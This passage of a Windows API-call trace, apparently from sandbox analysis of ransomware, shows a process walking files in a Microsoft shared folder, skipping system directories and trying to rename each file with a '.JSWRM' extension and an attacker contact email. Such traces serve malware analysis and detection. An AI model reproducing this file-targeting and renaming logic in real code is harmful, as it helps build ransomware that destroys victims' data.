[0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="..") returned 1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="...") returned 1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="windows") returned -1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="recovery") returned -1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="perflogs") returned -1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="documents and settings") returned 1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="system volume information") returned -1 [0068.427] lstrcmpiW (lpString1="ipsdan.xml", lpString2="msocache") returned -1 [0068.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdan.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdan.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdan.xml", lpUsedDefaultChar=0x0) returned 10 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdan.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdan.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdan.xml", lpUsedDefaultChar=0x0) returned 10 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.427] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9657491665344088) returned 0 [0068.427] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.428] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.428] CloseHandle (hObject=0xffffffff) returned 1 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.428] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2=".") returned 1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="..") returned 1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="...") returned 1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="windows") returned -1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="recovery") returned -1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="perflogs") returned -1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="documents and settings") returned 1 [0068.428] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.429] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="system volume information") returned -1 [0068.429] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="msocache") returned -1 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdeu.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdeu.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdeu.xml", lpUsedDefaultChar=0x0) returned 10 [0068.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdeu.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsdeu.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdeu.xml", lpUsedDefaultChar=0x0) returned 10 [0068.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.429] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9663916936418088) returned 0 [0068.429] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.429] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.429] CloseHandle (hObject=0xffffffff) returned 1 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.430] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.430] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsel.xml", cAlternateFileName="")) returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2=".") returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="..") returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="...") returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="windows") returned -1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="recovery") returned -1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="perflogs") returned -1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="documents and settings") returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="system volume information") returned -1 [0068.430] lstrcmpiW (lpString1="ipsel.xml", lpString2="msocache") returned -1 [0068.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsel.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsel.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsel.xml", lpUsedDefaultChar=0x0) returned 9 [0068.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsel.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsel.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsel.xml", lpUsedDefaultChar=0x0) returned 9 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.431] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9660996358656264) returned 0 [0068.431] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.431] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.431] CloseHandle (hObject=0xffffffff) returned 1 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.431] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.432] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2=".") returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="..") returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="...") returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="windows") returned -1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="recovery") returned -1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="perflogs") returned -1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="documents and settings") returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="system volume information") returned -1 [0068.432] lstrcmpiW (lpString1="ipsen.xml", lpString2="msocache") returned -1 [0068.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsen.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsen.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsen.xml", lpUsedDefaultChar=0x0) returned 9 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsen.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsen.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsen.xml", lpUsedDefaultChar=0x0) returned 9 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.433] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9663916936418904) returned 0 [0068.433] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, 